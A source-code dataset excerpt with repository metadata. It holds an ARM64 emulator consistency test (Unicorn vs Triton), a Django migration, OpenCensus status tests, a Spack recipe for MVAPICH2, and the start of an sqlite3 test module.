"x16": mu.reg_read(UC_ARM64_REG_X16),
"x17": mu.reg_read(UC_ARM64_REG_X17),
"x18": mu.reg_read(UC_ARM64_REG_X18),
"x19": mu.reg_read(UC_ARM64_REG_X19),
"x20": mu.reg_read(UC_ARM64_REG_X20),
"x21": mu.reg_read(UC_ARM64_REG_X21),
"x22": mu.reg_read(UC_ARM64_REG_X22),
"x23": mu.reg_read(UC_ARM64_REG_X23),
"x24": mu.reg_read(UC_ARM64_REG_X24),
"x25": mu.reg_read(UC_ARM64_REG_X25),
"x26": mu.reg_read(UC_ARM64_REG_X26),
"x27": mu.reg_read(UC_ARM64_REG_X27),
"x28": mu.reg_read(UC_ARM64_REG_X28),
"x29": mu.reg_read(UC_ARM64_REG_X29),
"x30": mu.reg_read(UC_ARM64_REG_X30),
"x30": mu.reg_read(UC_ARM64_REG_X30),
"pc": mu.reg_read(UC_ARM64_REG_PC),
"sp": mu.reg_read(UC_ARM64_REG_SP),
"n": ((mu.reg_read(UC_ARM64_REG_NZCV) >> 31) & 1),
"z": ((mu.reg_read(UC_ARM64_REG_NZCV) >> 30) & 1),
"c": ((mu.reg_read(UC_ARM64_REG_NZCV) >> 29) & 1),
"v": ((mu.reg_read(UC_ARM64_REG_NZCV) >> 28) & 1),
}
return ostate
def emu_with_triton(opcode, istate):
ctx = TritonContext()
ctx.setArchitecture(ARCH.AARCH64)
inst = Instruction(opcode)
inst.setAddress(istate['pc'])
ctx.setConcreteMemoryAreaValue(STACK, bytes(istate['stack']))
ctx.setConcreteMemoryAreaValue(HEAP, bytes(istate['heap']))
ctx.setConcreteRegisterValue(ctx.registers.x0, istate['x0'])
ctx.setConcreteRegisterValue(ctx.registers.x1, istate['x1'])
ctx.setConcreteRegisterValue(ctx.registers.x2, istate['x2'])
ctx.setConcreteRegisterValue(ctx.registers.x3, istate['x3'])
ctx.setConcreteRegisterValue(ctx.registers.x4, istate['x4'])
ctx.setConcreteRegisterValue(ctx.registers.x5, istate['x5'])
ctx.setConcreteRegisterValue(ctx.registers.x6, istate['x6'])
ctx.setConcreteRegisterValue(ctx.registers.x7, istate['x7'])
ctx.setConcreteRegisterValue(ctx.registers.x8, istate['x8'])
ctx.setConcreteRegisterValue(ctx.registers.x9, istate['x9'])
ctx.setConcreteRegisterValue(ctx.registers.x10, istate['x10'])
ctx.setConcreteRegisterValue(ctx.registers.x11, istate['x11'])
ctx.setConcreteRegisterValue(ctx.registers.x12, istate['x12'])
ctx.setConcreteRegisterValue(ctx.registers.x13, istate['x13'])
ctx.setConcreteRegisterValue(ctx.registers.x14, istate['x14'])
ctx.setConcreteRegisterValue(ctx.registers.x15, istate['x15'])
ctx.setConcreteRegisterValue(ctx.registers.x16, istate['x16'])
ctx.setConcreteRegisterValue(ctx.registers.x17, istate['x17'])
ctx.setConcreteRegisterValue(ctx.registers.x18, istate['x18'])
ctx.setConcreteRegisterValue(ctx.registers.x19, istate['x19'])
ctx.setConcreteRegisterValue(ctx.registers.x20, istate['x20'])
ctx.setConcreteRegisterValue(ctx.registers.x21, istate['x21'])
ctx.setConcreteRegisterValue(ctx.registers.x22, istate['x22'])
ctx.setConcreteRegisterValue(ctx.registers.x23, istate['x23'])
ctx.setConcreteRegisterValue(ctx.registers.x24, istate['x24'])
ctx.setConcreteRegisterValue(ctx.registers.x25, istate['x25'])
ctx.setConcreteRegisterValue(ctx.registers.x26, istate['x26'])
ctx.setConcreteRegisterValue(ctx.registers.x27, istate['x27'])
ctx.setConcreteRegisterValue(ctx.registers.x28, istate['x28'])
ctx.setConcreteRegisterValue(ctx.registers.x29, istate['x29'])
ctx.setConcreteRegisterValue(ctx.registers.x30, istate['x30'])
ctx.setConcreteRegisterValue(ctx.registers.pc, istate['pc'])
ctx.setConcreteRegisterValue(ctx.registers.sp, istate['sp'])
ctx.setConcreteRegisterValue(ctx.registers.n, istate['n'])
ctx.setConcreteRegisterValue(ctx.registers.z, istate['z'])
ctx.setConcreteRegisterValue(ctx.registers.c, istate['c'])
ctx.setConcreteRegisterValue(ctx.registers.v, istate['v'])
ctx.processing(inst)
ostate = {
"stack": ctx.getConcreteMemoryAreaValue(STACK, 0x100),
"heap": ctx.getConcreteMemoryAreaValue(HEAP, 0x100),
"x0": ctx.getSymbolicRegisterValue(ctx.registers.x0),
"x1": ctx.getSymbolicRegisterValue(ctx.registers.x1),
"x2": ctx.getSymbolicRegisterValue(ctx.registers.x2),
"x3": ctx.getSymbolicRegisterValue(ctx.registers.x3),
"x4": ctx.getSymbolicRegisterValue(ctx.registers.x4),
"x5": ctx.getSymbolicRegisterValue(ctx.registers.x5),
"x6": ctx.getSymbolicRegisterValue(ctx.registers.x6),
"x7": ctx.getSymbolicRegisterValue(ctx.registers.x7),
"x8": ctx.getSymbolicRegisterValue(ctx.registers.x8),
"x9": ctx.getSymbolicRegisterValue(ctx.registers.x9),
"x10": ctx.getSymbolicRegisterValue(ctx.registers.x10),
"x11": ctx.getSymbolicRegisterValue(ctx.registers.x11),
"x12": ctx.getSymbolicRegisterValue(ctx.registers.x12),
"x13": ctx.getSymbolicRegisterValue(ctx.registers.x13),
"x14": ctx.getSymbolicRegisterValue(ctx.registers.x14),
"x15": ctx.getSymbolicRegisterValue(ctx.registers.x15),
"x16": ctx.getSymbolicRegisterValue(ctx.registers.x16),
"x17": ctx.getSymbolicRegisterValue(ctx.registers.x17),
"x18": ctx.getSymbolicRegisterValue(ctx.registers.x18),
"x19": ctx.getSymbolicRegisterValue(ctx.registers.x19),
"x20": ctx.getSymbolicRegisterValue(ctx.registers.x20),
"x21": ctx.getSymbolicRegisterValue(ctx.registers.x21),
"x22": ctx.getSymbolicRegisterValue(ctx.registers.x22),
"x23": ctx.getSymbolicRegisterValue(ctx.registers.x23),
"x24": ctx.getSymbolicRegisterValue(ctx.registers.x24),
"x25": ctx.getSymbolicRegisterValue(ctx.registers.x25),
"x26": ctx.getSymbolicRegisterValue(ctx.registers.x26),
"x27": ctx.getSymbolicRegisterValue(ctx.registers.x27),
"x28": ctx.getSymbolicRegisterValue(ctx.registers.x28),
"x29": ctx.getSymbolicRegisterValue(ctx.registers.x29),
"x30": ctx.getSymbolicRegisterValue(ctx.registers.x30),
"x30": ctx.getSymbolicRegisterValue(ctx.registers.x30),
"pc": ctx.getSymbolicRegisterValue(ctx.registers.pc),
"sp": ctx.getSymbolicRegisterValue(ctx.registers.sp),
"n": ctx.getSymbolicRegisterValue(ctx.registers.n),
"z": ctx.getSymbolicRegisterValue(ctx.registers.z),
"c": ctx.getSymbolicRegisterValue(ctx.registers.c),
"v": ctx.getSymbolicRegisterValue(ctx.registers.v),
}
return ostate
def diff_state(state1, state2):
for k, v in list(state1.items()):
if (k == 'heap' or k == 'stack') and v != state2[k]:
print('\t%s: (UC) != (TT)' %(k))
elif not (k == 'heap' or k == 'stack') and v != state2[k]:
print('\t%s: %#x (UC) != %#x (TT)' %(k, v, state2[k]))
return
if __name__ == '__main__':
state = {
"stack": "".join([chr(255 - i) for i in range(256)]),
"heap": "".join([chr(i) for i in range(256)]),
"x0": 0,
"x1": 0,
"x2": 0,
"x3": 0,
"x4": 0,
"x5": 0,
"x6": 0,
"x7": 0,
"x8": 0,
"x9": 0,
"x10": 0,
"x11": 0,
"x12": 0,
"x13": 0,
"x14": 0,
"x15": 0,
"x16": 0,
"x17": 0,
"x18": 0,
"x19": 0,
"x20": 0,
"x21": 0,
"x22": 0,
"x23": 0,
"x24": 0,
"x25": 0,
"x26": 0,
"x27": 0,
"x28": 0,
"x29": 0,
"x30": 0,
"x30": 0,
"pc": ADDR,
"sp": STACK,
"n": 0,
"z": 0,
"c": 0,
"v": 0,
}
for opcode, disassembly in CODE:
try:
uc_state = emu_with_unicorn(opcode, state)
tt_state = emu_with_triton(opcode, state)
except Exception as e:
print('[KO] %s' %(disassembly))
print('\t%s' %(e))
sys.exit(-1)
if uc_state != tt_state:
print('[KO] %s' %(disassembly))
diff_state(uc_state, tt_state)
sys.exit(-1)
print('[OK] %s' %(disassembly))
state = tt_state
sys.exit(0)
| true | true |
1c4a8e4c20813902ae05d3230d53ca2da1867ab2 | 432 | py | Python | vendor/migrations/0006_vendor_sam_url.py | brethauer/mirage | 396f61206bf76f997c0535277af918058aa1b827 | [
"CC0-1.0"
] | null | null | null | vendor/migrations/0006_vendor_sam_url.py | brethauer/mirage | 396f61206bf76f997c0535277af918058aa1b827 | [
"CC0-1.0"
] | null | null | null | vendor/migrations/0006_vendor_sam_url.py | brethauer/mirage | 396f61206bf76f997c0535277af918058aa1b827 | [
"CC0-1.0"
] | null | null | null | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('vendor', '0005_vendor_sam_exclusion'),
]
operations = [
migrations.AddField(
model_name='vendor',
name='sam_url',
field=models.URLField(null=True),
preserve_default=True,
),
]
| 20.571429 | 48 | 0.597222 | from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('vendor', '0005_vendor_sam_exclusion'),
]
operations = [
migrations.AddField(
model_name='vendor',
name='sam_url',
field=models.URLField(null=True),
preserve_default=True,
),
]
| true | true |
1c4a8e8166224c62899fba51d3fc55b147695668 | 2,248 | py | Python | tests/unit/trace/test_status.py | bshaffer/opencensus-python | c624558c6829982d3464a5df29b48952f1fe23bc | [
"Apache-2.0"
] | null | null | null | tests/unit/trace/test_status.py | bshaffer/opencensus-python | c624558c6829982d3464a5df29b48952f1fe23bc | [
"Apache-2.0"
] | 1 | 2021-06-10T23:59:36.000Z | 2021-06-10T23:59:36.000Z | tests/unit/trace/test_status.py | bshaffer/opencensus-python | c624558c6829982d3464a5df29b48952f1fe23bc | [
"Apache-2.0"
] | 1 | 2019-09-01T06:00:13.000Z | 2019-09-01T06:00:13.000Z | # Copyright 2017, OpenCensus Authors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import unittest
from google.rpc import code_pb2
from opencensus.trace import status as status_module
class TestStatus(unittest.TestCase):
def test_constructor(self):
code = 100
message = 'test message'
status = status_module.Status(code=code, message=message)
self.assertEqual(status.code, code)
self.assertEqual(status.message, message)
self.assertIsNone(status.details)
def test_format_status_json_with_details(self):
code = 100
message = 'test message'
details = [
{
'@type': 'string',
'field1': 'value',
},
]
status = status_module.Status(
code=code, message=message, details=details)
status_json = status.format_status_json()
expected_status_json = {
'code': code,
'message': message,
'details': details
}
self.assertEqual(expected_status_json, status_json)
def test_format_status_json_without_details(self):
code = 100
message = 'test message'
status = status_module.Status(code=code, message=message)
status_json = status.format_status_json()
expected_status_json = {
'code': code,
'message': message
}
self.assertEqual(expected_status_json, status_json)
def test_create_from_exception(self):
message = 'test message'
exc = ValueError(message)
status = status_module.Status.from_exception(exc)
self.assertEqual(status.message, message)
self.assertEqual(status.code, code_pb2.UNKNOWN)
| 30.794521 | 74 | 0.656139 |
import unittest
from google.rpc import code_pb2
from opencensus.trace import status as status_module
class TestStatus(unittest.TestCase):
def test_constructor(self):
code = 100
message = 'test message'
status = status_module.Status(code=code, message=message)
self.assertEqual(status.code, code)
self.assertEqual(status.message, message)
self.assertIsNone(status.details)
def test_format_status_json_with_details(self):
code = 100
message = 'test message'
details = [
{
'@type': 'string',
'field1': 'value',
},
]
status = status_module.Status(
code=code, message=message, details=details)
status_json = status.format_status_json()
expected_status_json = {
'code': code,
'message': message,
'details': details
}
self.assertEqual(expected_status_json, status_json)
def test_format_status_json_without_details(self):
code = 100
message = 'test message'
status = status_module.Status(code=code, message=message)
status_json = status.format_status_json()
expected_status_json = {
'code': code,
'message': message
}
self.assertEqual(expected_status_json, status_json)
def test_create_from_exception(self):
message = 'test message'
exc = ValueError(message)
status = status_module.Status.from_exception(exc)
self.assertEqual(status.message, message)
self.assertEqual(status.code, code_pb2.UNKNOWN)
| true | true |
1c4a900d6a3357b0f159b0070ace473e54b8c9e3 | 81 | py | Python | CodeWars/7 Kyu/Coding 3min- Father and Son.py | anubhab-code/Competitive-Programming | de28cb7d44044b9e7d8bdb475da61e37c018ac35 | [
"MIT"
] | null | null | null | CodeWars/7 Kyu/Coding 3min- Father and Son.py | anubhab-code/Competitive-Programming | de28cb7d44044b9e7d8bdb475da61e37c018ac35 | [
"MIT"
] | null | null | null | CodeWars/7 Kyu/Coding 3min- Father and Son.py | anubhab-code/Competitive-Programming | de28cb7d44044b9e7d8bdb475da61e37c018ac35 | [
"MIT"
] | null | null | null | def sc(s):
xs = set(s)
return ''.join(c for c in s if c.swapcase() in xs) | 27 | 54 | 0.555556 | def sc(s):
xs = set(s)
return ''.join(c for c in s if c.swapcase() in xs) | true | true |
1c4a91d777b5ea2a8f62b27d050a042816f1964a | 9,570 | py | Python | var/spack/repos/builtin/packages/mvapich2/package.py | NickRF/spack | edecdc3ace7cbf5df2dcc090da3d1827c4099ebc | [
"ECL-2.0",
"Apache-2.0",
"MIT"
] | null | null | null | var/spack/repos/builtin/packages/mvapich2/package.py | NickRF/spack | edecdc3ace7cbf5df2dcc090da3d1827c4099ebc | [
"ECL-2.0",
"Apache-2.0",
"MIT"
] | null | null | null | var/spack/repos/builtin/packages/mvapich2/package.py | NickRF/spack | edecdc3ace7cbf5df2dcc090da3d1827c4099ebc | [
"ECL-2.0",
"Apache-2.0",
"MIT"
] | null | null | null | # Copyright 2013-2019 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
import sys
from spack import *
class Mvapich2(AutotoolsPackage):
"""MVAPICH2 is an MPI implementation for Infiniband networks."""
homepage = "http://mvapich.cse.ohio-state.edu/"
url = "http://mvapich.cse.ohio-state.edu/download/mvapich/mv2/mvapich2-2.2.tar.gz"
list_url = "http://mvapich.cse.ohio-state.edu/downloads/"
version('2.3rc2', '6fcf22fe2a16023b462ef57614daa357')
version('2.3rc1', '386d79ae36b2136d203826465ad8b6cc')
version('2.3a', '87c3fbf8a755b53806fa9ecb21453445')
# Prefer the latest stable release
version('2.3', sha256='01d5fb592454ddd9ecc17e91c8983b6aea0e7559aa38f410b111c8ef385b50dd', preferred=True)
version('2.2', '939b65ebe5b89a5bc822cdab0f31f96e')
version('2.1', '0095ceecb19bbb7fb262131cb9c2cdd6')
version('2.0', '9fbb68a4111a8b6338e476dc657388b4')
provides('mpi')
provides('mpi@:3.0')
variant('debug', default=False,
description='Enable debug info and error messages at run-time')
variant('cuda', default=False,
description='Enable CUDA extension')
variant('regcache', default=True,
description='Enable memory registration cache')
# Accepted values are:
# single - No threads (MPI_THREAD_SINGLE)
# funneled - Only the main thread calls MPI (MPI_THREAD_FUNNELED)
# serialized - User serializes calls to MPI (MPI_THREAD_SERIALIZED)
# multiple - Fully multi-threaded (MPI_THREAD_MULTIPLE)
# runtime - Alias to "multiple"
variant(
'threads',
default='multiple',
values=('single', 'funneled', 'serialized', 'multiple'),
multi=False,
description='Control the level of thread support'
)
# 32 is needed when job size exceeds 32768 cores
variant(
'ch3_rank_bits',
default='32',
values=('16', '32'),
multi=False,
description='Number of bits allocated to the rank field (16 or 32)'
)
variant(
'process_managers',
description='List of the process managers to activate',
values=disjoint_sets(
('auto',), ('slurm',), ('hydra', 'gforker', 'remshell')
).prohibit_empty_set().with_error(
"'slurm' or 'auto' cannot be activated along with "
"other process managers"
).with_default('auto').with_non_feature_values('auto'),
)
variant(
'fabrics',
description='The fabric enabled for this build',
default='psm',
values=(
'psm', 'sock', 'nemesisib', 'nemesis', 'mrail', 'nemesisibtcp',
'nemesistcpib', 'nemesisofi'
)
)
variant(
'alloca',
default=False,
description='Use alloca to allocate temporary memory if available'
)
variant(
'file_systems',
description='List of the ROMIO file systems to activate',
values=auto_or_any_combination_of('lustre', 'gpfs', 'nfs', 'ufs'),
)
depends_on('findutils', type='build')
depends_on('bison', type='build')
depends_on('pkgconfig', type='build')
depends_on('zlib')
depends_on('libpciaccess', when=(sys.platform != 'darwin'))
depends_on('libxml2')
depends_on('cuda', when='+cuda')
depends_on('psm', when='fabrics=psm')
depends_on('rdma-core', when='fabrics=mrail')
depends_on('rdma-core', when='fabrics=nemesisib')
depends_on('rdma-core', when='fabrics=nemesistcpib')
depends_on('rdma-core', when='fabrics=nemesisibtcp')
depends_on('libfabric', when='fabrics=nemesisofi')
filter_compiler_wrappers(
'mpicc', 'mpicxx', 'mpif77', 'mpif90', 'mpifort', relative_root='bin'
)
@property
def libs(self):
query_parameters = self.spec.last_query.extra_parameters
libraries = ['libmpi']
if 'cxx' in query_parameters:
libraries = ['libmpicxx'] + libraries
return find_libraries(
libraries, root=self.prefix, shared=True, recursive=True
)
@property
def process_manager_options(self):
spec = self.spec
other_pms = []
for x in ('hydra', 'gforker', 'remshell'):
if 'process_managers={0}'.format(x) in spec:
other_pms.append(x)
opts = []
if len(other_pms) > 0:
opts = ['--with-pm=%s' % ':'.join(other_pms)]
# See: http://slurm.schedmd.com/mpi_guide.html#mvapich2
if 'process_managers=slurm' in spec:
opts = [
'--with-pmi=pmi2',
'--with-pm=slurm'
]
return opts
@property
def network_options(self):
opts = []
# From here on I can suppose that only one variant has been selected
if 'fabrics=psm' in self.spec:
opts = [
"--with-device=ch3:psm",
"--with-psm={0}".format(self.spec['psm'].prefix)
]
elif 'fabrics=sock' in self.spec:
opts = ["--with-device=ch3:sock"]
elif 'fabrics=nemesistcpib' in self.spec:
opts = ["--with-device=ch3:nemesis:tcp,ib"]
elif 'fabrics=nemesisibtcp' in self.spec:
opts = ["--with-device=ch3:nemesis:ib,tcp"]
elif 'fabrics=nemesisib' in self.spec:
opts = ["--with-device=ch3:nemesis:ib"]
elif 'fabrics=nemesis' in self.spec:
opts = ["--with-device=ch3:nemesis"]
elif 'fabrics=mrail' in self.spec:
opts = ["--with-device=ch3:mrail", "--with-rdma=gen2",
"--disable-mcast"]
elif 'fabrics=nemesisofi' in self.spec:
opts = ["--with-device=ch3:nemesis:ofi",
"--with-ofi={0}".format(self.spec['libfabric'].prefix)]
return opts
@property
def file_system_options(self):
spec = self.spec
fs = []
for x in ('lustre', 'gpfs', 'nfs', 'ufs'):
if 'file_systems={0}'.format(x) in spec:
fs.append(x)
opts = []
if len(fs) > 0:
opts.append('--with-file-system=%s' % '+'.join(fs))
return opts
def setup_environment(self, spack_env, run_env):
spec = self.spec
# mvapich2 configure fails when F90 and F90FLAGS are set
spack_env.unset('F90')
spack_env.unset('F90FLAGS')
if 'process_managers=slurm' in spec:
run_env.set('SLURM_MPI_TYPE', 'pmi2')
def setup_dependent_environment(self, spack_env, run_env, dependent_spec):
spack_env.set('MPICC', join_path(self.prefix.bin, 'mpicc'))
spack_env.set('MPICXX', join_path(self.prefix.bin, 'mpicxx'))
spack_env.set('MPIF77', join_path(self.prefix.bin, 'mpif77'))
spack_env.set('MPIF90', join_path(self.prefix.bin, 'mpif90'))
spack_env.set('MPICH_CC', spack_cc)
spack_env.set('MPICH_CXX', spack_cxx)
spack_env.set('MPICH_F77', spack_f77)
spack_env.set('MPICH_F90', spack_fc)
spack_env.set('MPICH_FC', spack_fc)
def setup_dependent_package(self, module, dependent_spec):
self.spec.mpicc = join_path(self.prefix.bin, 'mpicc')
self.spec.mpicxx = join_path(self.prefix.bin, 'mpicxx')
self.spec.mpifc = join_path(self.prefix.bin, 'mpif90')
self.spec.mpif77 = join_path(self.prefix.bin, 'mpif77')
self.spec.mpicxx_shared_libs = [
join_path(self.prefix.lib, 'libmpicxx.{0}'.format(dso_suffix)),
join_path(self.prefix.lib, 'libmpi.{0}'.format(dso_suffix))
]
@run_before('configure')
def die_without_fortran(self):
# Until we can pass variants such as +fortran through virtual
# dependencies depends_on('mpi'), require Fortran compiler to
# avoid delayed build errors in dependents.
if (self.compiler.f77 is None) or (self.compiler.fc is None):
raise InstallError(
'Mvapich2 requires both C and Fortran compilers!'
)
def configure_args(self):
spec = self.spec
args = [
'--enable-shared',
'--enable-romio',
'--disable-silent-rules',
'--disable-new-dtags',
'--enable-fortran=all',
"--enable-threads={0}".format(spec.variants['threads'].value),
"--with-ch3-rank-bits={0}".format(
spec.variants['ch3_rank_bits'].value),
]
args.extend(self.enable_or_disable('alloca'))
if '+debug' in self.spec:
args.extend([
'--disable-fast',
'--enable-error-checking=runtime',
'--enable-error-messages=all',
# Permits debugging with TotalView
'--enable-g=dbg',
'--enable-debuginfo'
])
else:
args.append('--enable-fast=all')
if '+cuda' in self.spec:
args.extend([
'--enable-cuda',
'--with-cuda={0}'.format(spec['cuda'].prefix)
])
else:
args.append('--disable-cuda')
if '+regcache' in self.spec:
args.append('--enable-registration-cache')
else:
args.append('--disable-registration-cache')
args.extend(self.process_manager_options)
args.extend(self.network_options)
args.extend(self.file_system_options)
return args
| 35.054945 | 109 | 0.591536 |
import sys
from spack import *
class Mvapich2(AutotoolsPackage):
homepage = "http://mvapich.cse.ohio-state.edu/"
url = "http://mvapich.cse.ohio-state.edu/download/mvapich/mv2/mvapich2-2.2.tar.gz"
list_url = "http://mvapich.cse.ohio-state.edu/downloads/"
version('2.3rc2', '6fcf22fe2a16023b462ef57614daa357')
version('2.3rc1', '386d79ae36b2136d203826465ad8b6cc')
version('2.3a', '87c3fbf8a755b53806fa9ecb21453445')
version('2.3', sha256='01d5fb592454ddd9ecc17e91c8983b6aea0e7559aa38f410b111c8ef385b50dd', preferred=True)
version('2.2', '939b65ebe5b89a5bc822cdab0f31f96e')
version('2.1', '0095ceecb19bbb7fb262131cb9c2cdd6')
version('2.0', '9fbb68a4111a8b6338e476dc657388b4')
provides('mpi')
provides('mpi@:3.0')
variant('debug', default=False,
description='Enable debug info and error messages at run-time')
variant('cuda', default=False,
description='Enable CUDA extension')
variant('regcache', default=True,
description='Enable memory registration cache')
variant(
'threads',
default='multiple',
values=('single', 'funneled', 'serialized', 'multiple'),
multi=False,
description='Control the level of thread support'
)
variant(
'ch3_rank_bits',
default='32',
values=('16', '32'),
multi=False,
description='Number of bits allocated to the rank field (16 or 32)'
)
variant(
'process_managers',
description='List of the process managers to activate',
values=disjoint_sets(
('auto',), ('slurm',), ('hydra', 'gforker', 'remshell')
).prohibit_empty_set().with_error(
"'slurm' or 'auto' cannot be activated along with "
"other process managers"
).with_default('auto').with_non_feature_values('auto'),
)
variant(
'fabrics',
description='The fabric enabled for this build',
default='psm',
values=(
'psm', 'sock', 'nemesisib', 'nemesis', 'mrail', 'nemesisibtcp',
'nemesistcpib', 'nemesisofi'
)
)
variant(
'alloca',
default=False,
description='Use alloca to allocate temporary memory if available'
)
variant(
'file_systems',
description='List of the ROMIO file systems to activate',
values=auto_or_any_combination_of('lustre', 'gpfs', 'nfs', 'ufs'),
)
depends_on('findutils', type='build')
depends_on('bison', type='build')
depends_on('pkgconfig', type='build')
depends_on('zlib')
depends_on('libpciaccess', when=(sys.platform != 'darwin'))
depends_on('libxml2')
depends_on('cuda', when='+cuda')
depends_on('psm', when='fabrics=psm')
depends_on('rdma-core', when='fabrics=mrail')
depends_on('rdma-core', when='fabrics=nemesisib')
depends_on('rdma-core', when='fabrics=nemesistcpib')
depends_on('rdma-core', when='fabrics=nemesisibtcp')
depends_on('libfabric', when='fabrics=nemesisofi')
filter_compiler_wrappers(
'mpicc', 'mpicxx', 'mpif77', 'mpif90', 'mpifort', relative_root='bin'
)
@property
def libs(self):
query_parameters = self.spec.last_query.extra_parameters
libraries = ['libmpi']
if 'cxx' in query_parameters:
libraries = ['libmpicxx'] + libraries
return find_libraries(
libraries, root=self.prefix, shared=True, recursive=True
)
@property
def process_manager_options(self):
spec = self.spec
other_pms = []
for x in ('hydra', 'gforker', 'remshell'):
if 'process_managers={0}'.format(x) in spec:
other_pms.append(x)
opts = []
if len(other_pms) > 0:
opts = ['--with-pm=%s' % ':'.join(other_pms)]
if 'process_managers=slurm' in spec:
opts = [
'--with-pmi=pmi2',
'--with-pm=slurm'
]
return opts
@property
def network_options(self):
opts = []
if 'fabrics=psm' in self.spec:
opts = [
"--with-device=ch3:psm",
"--with-psm={0}".format(self.spec['psm'].prefix)
]
elif 'fabrics=sock' in self.spec:
opts = ["--with-device=ch3:sock"]
elif 'fabrics=nemesistcpib' in self.spec:
opts = ["--with-device=ch3:nemesis:tcp,ib"]
elif 'fabrics=nemesisibtcp' in self.spec:
opts = ["--with-device=ch3:nemesis:ib,tcp"]
elif 'fabrics=nemesisib' in self.spec:
opts = ["--with-device=ch3:nemesis:ib"]
elif 'fabrics=nemesis' in self.spec:
opts = ["--with-device=ch3:nemesis"]
elif 'fabrics=mrail' in self.spec:
opts = ["--with-device=ch3:mrail", "--with-rdma=gen2",
"--disable-mcast"]
elif 'fabrics=nemesisofi' in self.spec:
opts = ["--with-device=ch3:nemesis:ofi",
"--with-ofi={0}".format(self.spec['libfabric'].prefix)]
return opts
@property
def file_system_options(self):
spec = self.spec
fs = []
for x in ('lustre', 'gpfs', 'nfs', 'ufs'):
if 'file_systems={0}'.format(x) in spec:
fs.append(x)
opts = []
if len(fs) > 0:
opts.append('--with-file-system=%s' % '+'.join(fs))
return opts
def setup_environment(self, spack_env, run_env):
spec = self.spec
spack_env.unset('F90')
spack_env.unset('F90FLAGS')
if 'process_managers=slurm' in spec:
run_env.set('SLURM_MPI_TYPE', 'pmi2')
def setup_dependent_environment(self, spack_env, run_env, dependent_spec):
spack_env.set('MPICC', join_path(self.prefix.bin, 'mpicc'))
spack_env.set('MPICXX', join_path(self.prefix.bin, 'mpicxx'))
spack_env.set('MPIF77', join_path(self.prefix.bin, 'mpif77'))
spack_env.set('MPIF90', join_path(self.prefix.bin, 'mpif90'))
spack_env.set('MPICH_CC', spack_cc)
spack_env.set('MPICH_CXX', spack_cxx)
spack_env.set('MPICH_F77', spack_f77)
spack_env.set('MPICH_F90', spack_fc)
spack_env.set('MPICH_FC', spack_fc)
def setup_dependent_package(self, module, dependent_spec):
self.spec.mpicc = join_path(self.prefix.bin, 'mpicc')
self.spec.mpicxx = join_path(self.prefix.bin, 'mpicxx')
self.spec.mpifc = join_path(self.prefix.bin, 'mpif90')
self.spec.mpif77 = join_path(self.prefix.bin, 'mpif77')
self.spec.mpicxx_shared_libs = [
join_path(self.prefix.lib, 'libmpicxx.{0}'.format(dso_suffix)),
join_path(self.prefix.lib, 'libmpi.{0}'.format(dso_suffix))
]
@run_before('configure')
def die_without_fortran(self):
if (self.compiler.f77 is None) or (self.compiler.fc is None):
raise InstallError(
'Mvapich2 requires both C and Fortran compilers!'
)
def configure_args(self):
spec = self.spec
args = [
'--enable-shared',
'--enable-romio',
'--disable-silent-rules',
'--disable-new-dtags',
'--enable-fortran=all',
"--enable-threads={0}".format(spec.variants['threads'].value),
"--with-ch3-rank-bits={0}".format(
spec.variants['ch3_rank_bits'].value),
]
args.extend(self.enable_or_disable('alloca'))
if '+debug' in self.spec:
args.extend([
'--disable-fast',
'--enable-error-checking=runtime',
'--enable-error-messages=all',
'--enable-g=dbg',
'--enable-debuginfo'
])
else:
args.append('--enable-fast=all')
if '+cuda' in self.spec:
args.extend([
'--enable-cuda',
'--with-cuda={0}'.format(spec['cuda'].prefix)
])
else:
args.append('--disable-cuda')
if '+regcache' in self.spec:
args.append('--enable-registration-cache')
else:
args.append('--disable-registration-cache')
args.extend(self.process_manager_options)
args.extend(self.network_options)
args.extend(self.file_system_options)
return args
| true | true |
1c4a92c5094d36b0d5c48b0030aed8a13467ea5b | 371 | py | Python | arxiv/base/tests/test_factory.py | ibnesayeed/arxiv-base | 9f49302370272792a0afc78debd039d249844c6c | [
"MIT"
] | 23 | 2019-01-10T22:01:18.000Z | 2022-02-02T10:28:25.000Z | arxiv/base/tests/test_factory.py | ibnesayeed/arxiv-base | 9f49302370272792a0afc78debd039d249844c6c | [
"MIT"
] | 57 | 2018-12-17T16:45:38.000Z | 2021-12-14T14:20:58.000Z | arxiv/base/tests/test_factory.py | cul-it/arxiv-base-ui | a5beadf44c24f72e21313299bfafc1ffb9d28ac7 | [
"MIT"
] | 5 | 2019-01-10T22:01:28.000Z | 2021-11-05T12:25:31.000Z | from unittest import TestCase
from flask import Flask
from arxiv.base.factory import create_web_app
class TestBaseAppFactory(TestCase):
"""Tests for :mod:`arxiv.base.factory`."""
def test_create_web_app(self):
""":func:`.create_web_app` generates a :class:`.Flask` instance."""
app = create_web_app()
self.assertIsInstance(app, Flask)
| 26.5 | 75 | 0.703504 | from unittest import TestCase
from flask import Flask
from arxiv.base.factory import create_web_app
class TestBaseAppFactory(TestCase):
def test_create_web_app(self):
app = create_web_app()
self.assertIsInstance(app, Flask)
| true | true |
1c4a940d0cdd6c7b7b1ab2fcfcbb3402c6214e07 | 18,464 | py | Python | pypy3.9-v7.3.9-win64/Lib/sqlite3/test/userfunctions.py | LawrenceZ1A/MultipurposeProject | 54d5898301d01c33dd771b29e2e19e20d3875a21 | [
"Apache-2.0"
] | null | null | null | pypy3.9-v7.3.9-win64/Lib/sqlite3/test/userfunctions.py | LawrenceZ1A/MultipurposeProject | 54d5898301d01c33dd771b29e2e19e20d3875a21 | [
"Apache-2.0"
] | 1 | 2022-02-22T00:59:49.000Z | 2022-02-22T00:59:49.000Z | pypy3.9-v7.3.9-win64/Lib/sqlite3/test/userfunctions.py | LawrenceZ1A/MultipurposeProject | 54d5898301d01c33dd771b29e2e19e20d3875a21 | [
"Apache-2.0"
] | 1 | 2022-03-30T11:42:37.000Z | 2022-03-30T11:42:37.000Z | # pysqlite2/test/userfunctions.py: tests for user-defined functions and
# aggregates.
